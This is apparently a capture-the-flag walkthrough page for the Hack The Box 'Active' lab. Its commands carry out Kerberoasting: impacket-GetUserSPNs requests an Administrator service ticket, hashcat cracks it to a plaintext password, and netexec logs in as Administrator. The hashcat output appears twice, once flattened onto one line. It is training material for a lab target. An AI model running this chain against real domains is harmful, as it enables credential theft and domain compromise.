Foothold

adot@kali:~/oscp/htb/windows/active$ netexec smb 10.10.10.100 -u SVC_TGS -p 'GPPstillStandingStrong2k18'

$ sudo impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip 10.10.10.100 -request

$ subl admin.hash

$ hashcat -m 13100 admin.hash ~/rockyou.txt -O       
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 7 6800HS with Radeon Graphics, 10573/21211 MB (4096 MB allocatable), 16MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 31

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 4 MB

Dictionary cache hit:
* Filename..: /home/adot/rockyou.txt
* Passwords.: 14344387
* Bytes.....: 139921525
* Keyspace..: 14344387

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$df365a63c2d73980d1f9f7e53a5ae8b5$f469bb203bef52fd90e60b53421edf72b091d45ee57c92195a75b88ece4254cb195554e8d24b5aaae9e19381d3e3f5549c89ca8ed29f0cabca53df3fc902bdf33086acc1949e17cc3e4d059b3794c5a3e2063de887810018a4f5c87a0d1f39d947f27a9fe7d5aab1a90a799b618533670a14e9062891c2b11126acb0ec0ad1467983edea934653e2f92b24dc89f57a009910d4767f8a835e83ff8fbff214990641b68f13c41da8223ad79d18997e1775ade15d2e1e6cc3faaa8ff5a0385e96895d884a4ca9523ea7f02b269b4546f81d4b6b5127a50473e2dd44cd56d492d1057558e375c507d19dd697b1ff7c644982eaf43c2de2f7905702038dfc5df6ad577acb444411060e7fe26e64be183a2d84e86b19b0e575d16c2156a39c956aead602141d528d38a2fce3537da13f40eb765eca084ac181706b588d2bc1b5605d2dcb1bd7fe5f2bfed1d860cadcb9164f0aa0980fb20b4c749fb8ea3e81af9dc29ef9e31b0749e1aae1de3509a74013822af65d79643ee77e34251ccebb141a432a1cac9679ca340bf389410320a6a2647dfeae82dbbad40ac7b6787a72add9d7228d0fbda125d0f30d81b47f0456c6307c0efd9b395a42e966260725add8531da55a7845c5ad61bc0e84d054886c7e8e6150792136250d6c0b24889b195cade8e6d359f7da22fd385f3fe83b55864c4c533a20b70f3b3887be659c574df21896683eb6569b43ebe44846399d37228f8d87845398c70b42dc5a5bcbad09427f4cfd58a84cc9658f711df3650123e4779bf39a96f50bfb1a621641f942e076a3aad9ef6fb3ba0793b26c640dd13b6639be1653d4460546457c8e3b4a1069de6da1667abe10eb1f835edaa71d59a09e86626e9960c57d56c52193b837b9d822d45576ea22fd7ead47665b1c158c72f5099b38f1f94784490f5386384fb024444e3c5410a845da1df1e06588380a3b2f61ef756753d5855a2fb06c2f4a7a4f4e7b9cf423688e026d2fe693bb9736b44ae88c02aebb930c5a95978fc2d4e2c5e16295ccb7df335212a61bb03bf6f1dbbc54832ff39389de50847142a98e1bae07f76d422bfb71376b8807c23154dbd4b4bc6378389fd3ef9db25ebd903ff778ae1501731a5c6bcc6b0a9f8671a2f6a111269b8572c1297c75b59a42b7bf64af8e0fb7ab457e108f6406416b63dcb544546f06fe7d4e4db6d03cb99a7bf64a084f829cb9e5ebda7f8d27fdd2fa62bfa06c879b5dc63ef2ab770126c640dc:Ticketmaster1968
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...c640dc
Time.Started.....: Sat May 25 13:59:27 2024 (2 secs)
Time.Estimated...: Sat May 25 13:59:29 2024 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (/home/adot/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4467.9 kH/s (2.37ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10553348/14344387 (73.57%)
Rejected.........: 2052/10553348 (0.02%)
Restore.Point....: 10536957/14344387 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: TiffanyD -> TRISHHA
Hardware.Mon.#1..: Temp: 90c Util: 63%

Started: Sat May 25 13:59:26 2024
Stopped: Sat May 25 13:59:31 2024

$ netexec smb 10.10.10.100 -u Administrator -p 'Ticketmaster1968'

Previous445 NextEnumeration

Last updated 1 year ago

$ hashcat -m 13100 admin.hash ~/rockyou.txt -O hashcat (v6.2.6) starting OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ================================================================================================================================================== * Device #1: cpu-haswell-AMD Ryzen 7 6800HS with Radeon Graphics, 10573/21211 MB (4096 MB allocatable), 16MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 31 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Optimized-Kernel * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 4 MB Dictionary cache hit: * Filename..: /home/adot/rockyou.txt * Passwords.: 14344387 * Bytes.....: 139921525 * Keyspace..: 14344387 $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$df365a63c2d73980d1f9f7e53a5ae8b5$f469bb203bef52fd90e60b53421edf72b091d45ee57c92195a75b88ece4254cb195554e8d24b5aaae9e19381d3e3f5549c89ca8ed29f0cabca53df3fc902bdf33086acc1949e17cc3e4d059b3794c5a3e2063de887810018a4f5c87a0d1f39d947f27a9fe7d5aab1a90a799b618533670a14e9062891c2b11126acb0ec0ad1467983edea934653e2f92b24dc89f57a009910d4767f8a835e83ff8fbff214990641b68f13c41da8223ad79d18997e1775ade15d2e1e6cc3faaa8ff5a0385e96895d884a4ca9523ea7f02b269b4546f81d4b6b5127a50473e2dd44cd56d492d1057558e375c507d19dd697b1ff7c644982eaf43c2de2f7905702038dfc5df6ad577acb444411060e7fe26e64be183a2d84e86b19b0e575d16c2156a39c956aead602141d528d38a2fce3537da13f40eb765eca084ac181706b588d2bc1b5605d2dcb1bd7fe5f2bfed1d860cadcb9164f0aa0980fb20b4c749fb8ea3e81af9dc29ef9e31b0749e1aae1de3509a74013822af65d79643ee77e34251ccebb141a432a1cac9679ca340bf389410320a6a2647dfeae82dbbad40ac7b6787a72add9d7228d0fbda125d0f30d81b47f0456c6307c0efd9b395a42e966260725add8531da55a7845c5ad61bc0e84d054886c7e8e6150792136250d6c0b24889b195cade8e6d359f7da22fd385f3fe83b55864c4c533a20b70f3b3887be659c574df21896683eb6569b43ebe44846399d37228f8d87845398c70b42dc5a5bcbad09427f4cfd58a84cc9658f711df3650123e4779bf39a96f50bfb1a621641f942e076a3aad9ef6fb3ba0793b26c640dd13b6639be1653d4460546457c8e3b4a1069de6da1667abe10eb1f835edaa71d59a09e86626e9960c57d56c52193b837b9d822d45576ea22fd7ead47665b1c158c72f5099b38f1f94784490f5386384fb024444e3c5410a845da1df1e06588380a3b2f61ef756753d5855a2fb06c2f4a7a4f4e7b9cf423688e026d2fe693bb9736b44ae88c02aebb930c5a95978fc2d4e2c5e16295ccb7df335212a61bb03bf6f1dbbc54832ff39389de50847142a98e1bae07f76d422bfb71376b8807c23154dbd4b4bc6378389fd3ef9db25ebd903ff778ae1501731a5c6bcc6b0a9f8671a2f6a111269b8572c1297c75b59a42b7bf64af8e0fb7ab457e108f6406416b63dcb544546f06fe7d4e4db6d03cb99a7bf64a084f829cb9e5ebda7f8d27fdd2fa62bfa06c879b5dc63ef2ab770126c640dc:Ticketmaster1968 Session..........: hashcat Status...........: Cracked Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...c640dc Time.Started.....: Sat May 25 13:59:27 2024 (2 secs) Time.Estimated...: Sat May 25 13:59:29 2024 (0 secs) Kernel.Feature...: Optimized Kernel Guess.Base.......: File (/home/adot/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 4467.9 kH/s (2.37ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 10553348/14344387 (73.57%) Rejected.........: 2052/10553348 (0.02%) Restore.Point....: 10536957/14344387 (73.46%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: TiffanyD -> TRISHHA Hardware.Mon.#1..: Temp: 90c Util: 63% Started: Sat May 25 13:59:26 2024 Stopped: Sat May 25 13:59:31 2024